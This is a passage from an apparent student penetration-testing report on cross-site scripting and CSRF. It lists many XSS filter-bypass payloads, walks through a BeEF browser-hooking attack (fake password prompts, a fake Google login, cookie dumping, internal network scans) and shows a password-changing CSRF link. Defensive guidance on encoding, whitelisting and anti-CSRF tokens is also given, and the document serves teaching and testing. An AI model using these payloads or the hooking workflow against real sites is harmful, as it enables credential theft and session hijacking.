The attacker can then log in with that session cookie. The lack of dynamic cookies
points back to previous sections in this report, where static cookies are generally
insecure. There is common confusion pertaining to XSS where individuals wonder
why an attacker who is able to inject custom scripts cannot just send the user of a

particular site to, and have the users token
stolen from there. Why must the attacker actually inject into the target website and
ask the application to send the token to their hosted malicious site? Browsers have
security implemented in them known as Same Origin Policy. This disallows
cookies being transmitted across domains that are not assigned to that domain and
issued by the particular. XSS defeats this in a way, as it has the vulnerable site
send the token on its behalf. The term cross site scripting should make much
more sense at this point.
The second type of XSS is known as stored, persistent, or second order
XSS. Instead of being reflected by a URL, the attacker can store this malicious
script in the actual database of the web application. This could be for example, a
messaging inbox for an admin, a forum post, or any area of an application where
content can be submitted and viewed by other users. This is far more dangerous
that reflected XSS attacks for a number of reasons. It was explained that reflective
XSS attacks involve sending a link to a user and hopefully coercing the to click on it
during their actual session, if the intent was to hijack cookies. With stored XSS, the
application spreads the script for you, eliminating the need to send links to users.
Also, it is common sense that if a user is being inflicted against a stored XSS attack,
that they are already in a current session and interacting with the web application.

Seen above, is another seemingly normal web application that involves submitting
input and a name to sign a guestbook. Upon submitting input to the guestbook, it is
stored in the database, and returned back to the browser. The above payload is to
test for any type of stored XSS vulnerability.

The application is proved to be vulnerable. Every time a user loads the page to sign
the guestbook, the alert box is triggered.
The two previous XSS attacks relied on the server returning a response
page with the attacker code being carried by it. DOM based XSS utilizes a different
method, where upon a user going to a specific URL, the payload is embedded in the
page already. Ignoring any payload delivered by the a URL response, the client side
browser executes the code, and in a reverse way, dynamically interacts with a static
URL. When a victim clicks on the crafted link, they are not dynamically delivered
any payload, but their browser takes the hard coded malicious script and executes it
instead. DOM based XSS is not necessarily detectable server side as the code is
never seen by the server. When the browser accesses the vulnerable URL, it beings
to build DOM by pulling attributes from objects referenced by specific properties.
(ex:document.url) The document objects that contain the payload are added to the
property, such as, and the malicious script is now parsed into
the HTML. The attack is mounted and most likely successful at this point.


Above, a command to firebug is issued. The localStorage.setItem command will

effectively add code to the testers local DOM storage.

The DOM is subsequently checked using firebug, and it is confirmed that the
attributes Attack Attempt, Confirmed were actually added using the setItem

The attacker in the figure above is now able to test for injection. The above code
will instruct a browser to run a script that adds to the DOM, (SCRIPT,
EXECUTED). Anyone visiting this page will have this injection run when the
browser builds the page.


The blog posting is successful, and no malicious code explicitly shows up. Logged in
as another user, the tester should visit the same page and check their local storage
to see if the script ran. If the user is exploited, the browsers local DOM will reflect
what the payload instructed.

The DOM is checked revealing a massive issue. The user has run the malicious
payload. Obviously, this test confirms the vulnerability, but a more malicious
payload would be used by an actual attacker. Executing a Trojan, keylogger,
stealing credentials, or defacing the page itself are just some of the many methods
an actual malicious attacker would leverage against users browsers.
XSS attacks are very versatile in their attack vectors. Virtual
defacement occurs when the sites contents are not physically changed, but the
XSS attack displays content on top of the site, or does a tricky redirect with
defacement content. This ranges from simple mocking photos, to defamatory
statements that could cause financial gain for the attacker, and financial ruin for the
victim site. Visualize an attacker who executes a script on the victim site
explaining they are out of business, and that the partner site should be visited
instead(with an appropriate link of course). Another example, as mentioned
previously, is session hijacking and privilege escalation. If an admin gets their
session token compromised by an XSS attack, the attacker can place a Trojan form
on the site with the escalated privileges they have recently received. The Trojan
form would effectively log the account details of all members who log in. Most
troubling, imagine a shopping application that is being exploited by a stored XSS

injection. When the user goes to the checkout page they are prompted with a credit
card form field that is not actually from the company. These attacks are devastating
because the attackers do not need to phish victims into going to a different site
hosted on another domain and server. The SSL certificates stay the same as the
attacks are kept on the actual victim site. To further complicate things for victim
sites, the nature of stored XSS attacks allow the attacks to take on worm like
qualities. The famous MySpace stored XSS attack is a good example of this. The
attacker created a payload that caused any user visiting his page to automatically
add him as a friend. To make matters worse, the script was then injected into their
page as well. This accomplished two things: it caused mass exploitation of multiple
users with little legwork from the actual hacker, and in a sense it made it harder to
trace the source of the offender. Based on this propagation quality of XSS, attackers
can exploit users to act as zombie offenders. The victim user gets hit with a
malicious payload that performs malicious activity to the application from their own
account, acting on the attackers behalf.
The delivery of reflective XSS attacks and stored XSS attacks come in
multiple flavors. Simply spamming links on forums and sites can be a hit or miss
method to exploit users. Sending targeted emails to specific users, or just mass
mailing spam with the malicious link can be effective. Attackers will also simply
host their own website with interesting click worthy content that is actually a haven
for infecting users. Other attackers will essentially pay for victims; by paying more
popular sites or simply the site they are targeting, to allow the attackers to host ads
on the site In question. When the attackers add gets clicks, they get infections or
sessions depending on the vector. It is extremely common for websites to employ
a mechanism where a user can contact the administrator of a site, or use a tell a
friend feature of some sort. This is a haven where post request stored XSS attacks
to occur. It should further be clarified that a reflective XSS attack requires the
generation of a GET request, where a stored attack employs a POST. Most of the
stored attacks discussed thus far would be classified as in-band attacks, where
the script executes on the application because of input submitted through a form
field of some type that is integrally built into the application. Out of band attacks
differ in the sense that a different channel is used to broadcast the attack, but
ultimately the script is still executed on the applications domain. Specifically, a
payload sent through email, which obviously hits an SMTP server first, but only
becomes malicious when the html is rendered on the web applications email
Finding XSS attacks is not limited to the weak popup alert of any
message. For example:<script>alert(document.cookie)</script> displays the
user cookie, most likely chained together with further script to send to an attacker


The injecting of the script <img src="""",'height=800,width=800');> causes the
application to redirect to another site when the first site fails to open. This payload
could be used to redirect users to a malicious site that injects malware.
Applications will look to sanitize data by escaping characters, applying
white lists, blacklists, etc. There are many ways to circumvent these filters by using
encoding, using different tagging characters, changing case, doubling characters
that get escaped(<scr<script>ipt>), combining multiple scripting languages
together, working around the . character when it is being blocked.
The most basic filters will without a doubt block the <script> tag.
Fortunately, there are ways to circumvent this. An example from the Web
Application Hackers Handbook specifies, <object
data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==> as
many time an effective bypass. The base 64 encoded string
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==> decodes exactly to
Using different event handlers to invoke scripts is effective as well.
Consider for example: </a onmousemove=alert(EXECUTE>. Common sense
tells the tester that this would be invoked immediately, and it avoids common filter
tags In the process.
<embed src=javascript:alert(test)> is example of script pseudo
code that will execute in browsers as well. The pseudo script gives the advantage
that is may bypass certain filters where the attributes being injected into are to
receive URL parameters.
Bypassing filters can be done by manipulating the tag name. Consider
the original example of <img onerror=alert("hack") src=b>. Simply changing the
image case iMg can bypass filters. The use of null bytes or empty spaces can also
bypass filters when being inserted within the tag. <[%00]img onerror=alert("hack")
src=b> or <i[%00]mg onerror=alert("hack") src=b> are good examples of this.
More tag manipulation to bypass filters includes the use of adding spaces after the

tag name and before the attribute. Consider these examples: <img/
onerror=alert("hack") src=b>, <img/ onerror=alert("hack") src=b>, <img/
onerror=alert("hack") src=b>, <img/BYPASSPLEASE/ onerror=alert("hack") src=b>,
and <img [%0a] onerror=alert("hack") src=b>.
An attacker can use the same null byte bypass on the attribute name,
not just the tag. This will evade many signature based filters. Ex: <img
on[%00}error.. .
The attacker can also manipulate the actual attributes by using
delimiters to eliminate whitespaces that inevitably follow the attribute value.
For example: <img onerror=alert("hack") src=b>,<img onerror=alert("hack")
The attributes can be exposed to further manipulation by the order, and adding
backticks to make the filter think there is no event handler occurring.
Ex: <img src=b onerror=alert(HACKED)>
Attribute values are decoded by the browser before being passed on to
the ensuing application, which infers that parts of value names can be encoded with
html to pass some filters. This is an example of the a in alert being html
encoded to bypass a filter: <img onerror=&#x61;lert("hack") src=b>. The following
can also be done for further tricking of filters. The way html decoding works, allows
an attacker to append zeroes to the end of the encoded character. It will produce
outputs like the following: &#x0610;, &#x006100;, &#x0061;, and &#000061;.
That is not all. Hexadecimal as well as decimal format can be used and the attacker
can also try variations where the semicolon is omitted.
A powerful means of filter bypass is to employ the encoding methods of
UTF-7, US-ASCII, and UTF-16. <script>alert(1)</script> encoded as :
UTF-7: +ADw-script+AD4-alert(1)+ADw-/script+AD4-
The challenge with using these encoding methods is to get the browser to actually
process it with the correct character set. Intercepting and modifying the ContentType header can allow this to function.
Other escape methods are able to be used. Unicode escapes,
hexadecimals escapes, and octal escapes even.
Example of a Unicode escape in alert:a\u006clert

Beating sanitation removal involves multiple creative steps. Apply
<script><script>.. if the filter does not escape <script> recursively. In
situations where there is multiple steps of sanitation being attempted, efforts should
be made to analyze the order. Applying <scr<object>ipt> would allow a
successful injection if the filter looked to sanitize script recursively.

Medium security filter bypass with: <img src='s' onerror=prompt('vulnerable')>.

Switching around the attributes and using delimiters tricks the application into
thinking there is no event handle starting effectively with on and that there is
only one attribute.

To eliminate XSS vulnerabilities a three rule approach should be

followed. First is must be understand thoroughly how XSS operates. Anywhere in
an application where user input is passed in responses, whether through POST or
GET requests, requires close examination. This obviously means all in band
channels where user input is passed, but out of band such as smtp to html. User
input must be validated and sanitized, user output must be validated and sanitized,
and dangerous insertion points must be eradicated.
When user input is passed into responses, the relevance of the
response must be taken into account. Length limiting and heavy character limiting
should be applied based on the function being interacted with. Where a credit card
field is only a certain number of digits, only digits should be allowed, and the
specific length should be enforced. Email address fields dont need certain special
characters. Any useful data to the attacker needs to be filtered, escaped, and html
encoded. HTML encoding user supplied input gives an assurance that malicious
payloads are not integrated into the structure of the site itself, but as part of the
html of the site. It is preferable that user input is never passed into event handlers
as javascript strings, but if it is necessary than heavy escaping needs to occur. The
method is to escape the quotation character and blackslash character with
backslashes, and then html encode the semicolon character and ampersand
character so the attacker cannot perform html encoding themselves. Overall, the
best practice would be to HTML encode all nonalphanumeric characters. The

defense in depth approach of input validation, and output validation is necessary to
defeat XSS. There are many instances where user supplied input should never be
passed as input. Code that is contained within event handlers, and existing script
code, most notably script code where there are URLs being passed as values should
absolutely not contain user supplied input.
It should be understood that web applications exist that need actual
users to submit HTML code with user input. Regardless, strict rules should be
deployed that limit user supplied HTML code. Where HTML code submitted by users
is being used, it cannot be HTML encoded, as it would appear on the screen in
markup language. This implies that such heavy filtering and encoding cannot be
used universally across an application like this. In this situation, a heavy whitelist of
only certain tags as well as attributes should be used. Careful measures also must
be taken to limit HTML code, neutering it from being able to invoke any scripts.
Securing DOM based issues with XSS is tricky as the input is never
actually passed by the server reponse, as it is built client side by the browser.
Inherently, avoiding allowing client side scripts to pull from the DOM to build the site
should be disallowed as much as possible. Where this must occur, a similar
approach is taken when securing against stored and reflective attacks. Input
validation controls should be applied and whitelist alphanumeric characters only,
and only one parameter should be contained in the query string. Output validation
once again falls on heavy encoding so the data can be displayed safely on the page
as HTML.
Testing for XSS has been shown extensively, but a penetration tester
would not be taken too seriously if all they showed the company at risk dialog boxes
popping up. XSS allows the leveraging of very powerful tools that have their own
payloads, and when such payloads are executed, the tool is able to hook into the
users browser and launch attacks. BEEF framework tool will be used to hook into
the victims browser after the script is executed, effectively allowing the stealing
credentials, user login sessions, network scanning firewall bypass, and Google
phishing pages.

BEEEF xss hooking service started on port 3000.


The applications functionality Is inspected.

Possible area to test for vulnerability as user input is reflected dynamically on the site.

The payload is pointed to the URL parameter that will be reflectively served to the user.
<script src=</script>

A windows browser appears as online in the BEEF tool, notifying us remotely that
the injection and hook was successful.


A fake prompt is pushed to the user's browser, telling them to reenter their password to stay logged in.

The hooked browser receives the prompt.

BEEF receives the password.


A fake phishing login is pushed to the users browser. Notice the domain is not Google, but the vulnerable site.

The user is automatically redirected to the real Google site after submitting the credentials.

BEEF harvests gmail credentials successfully.


BEEF is commanded to dump the users current session cookie. This cookie can be placed into the cookie header of
an http request and hijack the session without a password.

Other interesting commands built into the hooking tool for network scans. Denial of
service attacks can be performed, or more satisfyingly, internal network scans of
the users network. Having the user perform the scans on an attackers behalf not
only allows the bypass of external firewalls, but lets the attacker map out further
attacks as they find ways to pivot through the system.


Cross site request forgery is aimed at forcing a user of some website; to
perform an unintended action on their website, by clicking a link on methodically
placed other website. These attacks can persist and succeed where XSS fails. The
user only needs to be manipulating in making a specific request to their already
vulnerable application. URL requests on vulnerable sites that perform powerful
functions are ripe for XSRF when they share 3 common issues. The first issue that
makes XSRF possible is weak session handling. Where there is only a simple http
cookie tracking the session, and no other parameters in place that dictate state, the
requests in question are vulnerable. Secondly, the privileged action in question is
being passed through URL parameters and it is very simple to deduce what the
function is. Thirdly, and though this may be comparable to the weak http cookie, all
parameters needed to execute the action are known to the attacker. Early defenses
against crafted URLS from across domain spaces was to validate what was actually
being requested, was being performed. For example, perhaps an attacker crafted a
site that needed to leverage more power than what simple <img> tags embedded
in a site would afford. To protect against manipulation of a user on the victim site,
there was validation by the application an actual image was returned.
Unfortunately, attackers simply submitted an image, at some point in time, and
then utilized a redirect to site closer to, or at the time of use by the victim.
Essentially, the basis of CSRF attacks revolve around the attacker riding
the malicious users session, and with the http cookie being the only check method
of the users session, the session can be ridden very deeply by the attacker.
Obviously, a user needs to be logged in to perform the powerful task the attacker
hopes to accomplish. Authentication is key with CSRF attacks, but it Is not
necessarily the user that needs to be logged in under their own account. For
example, consider an application that allows a user to upload files of their
choosing, and download them at their convenience. In the realm of CSRF, an attack
wouldnt cause a user authenticated as themselves to download a file that the
attacker uploaded, or force an upload of a file for the attacker to download. More
realistically, an attacker could instead craft a URL that logs the victim in under the
attackers credentials. The logical step for the attacker is to upload malicious
payloads and get the user to download them on the attackers behalf.
Defense against these one way attacks revolve around the heavy use of
anti CSRF tokens. These tokens are placed in hidden form fields and sent with the
request, along with the actual session cookie. They should not be easily brute
forced, despite many developers believing that the use of multiple tokens being
submitted throughout a session would not be subjugated to an attack. When an
attacker attempts a redirect, their parameters being supplied will not be sufficient
enough as they wont have any way of knowing the tokens linked in the users
session. Understanding how XSRF works, it is sufficient to say that a token

submitted to a user in a response, should not be identical during the next response
being sent by the user. If the attacker attempts a redirect and the token does not
change at certain points, the entire benefit of using the tokens is nullified. Many
developers mistakenly have relied on using the referrer header to check if the
request originated from the actual domain. At this point it should be understand
how pointless this check is, as it is trivially able to be spoofed in Burp.
The first step in executing an XSRF attack is to analyze the request URL. We can
see that when a user enters their password to change it, the function is built into
the URL parameter and can be changed via URL parameters.

Create really simple Click here button with the request built into the html.

Test the code

Communicate with the admin somehow. Notice the request is hidden in the link,
and the attacker knows the password will be changed to OWNED.


The admin gets password changed to OWNED.

This is a simple concept, and if the admin was paying attention, they would
probably change the password back to the old once before an attacker could
leverage an attack. The real damage is situations where things are more subtle, like
the adding of a new user, or the privledges of a regular user being updated. Also,
imagine if this type of forgery redirection was used not to change passwords, but to
submit funds transfers!

In conclusion, there is such a vast array of different attack vectors and
cross connecting technologies being used between applications and browser, and
therefore the securing of applications is a massive undertaking. There are many
more attacks and vulnerabilities that this project has not covered, but it the bread

and butter security flaws have been discussed in depth. This project should be
useful for beginners and intermediates alike, looking to improve, refresh, and
sharpen their penetration testing skills.

1. Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook:
Discovering and Exploiting Security Flaws. Indianapolis, IN: Wiley Pub., 2008. Print.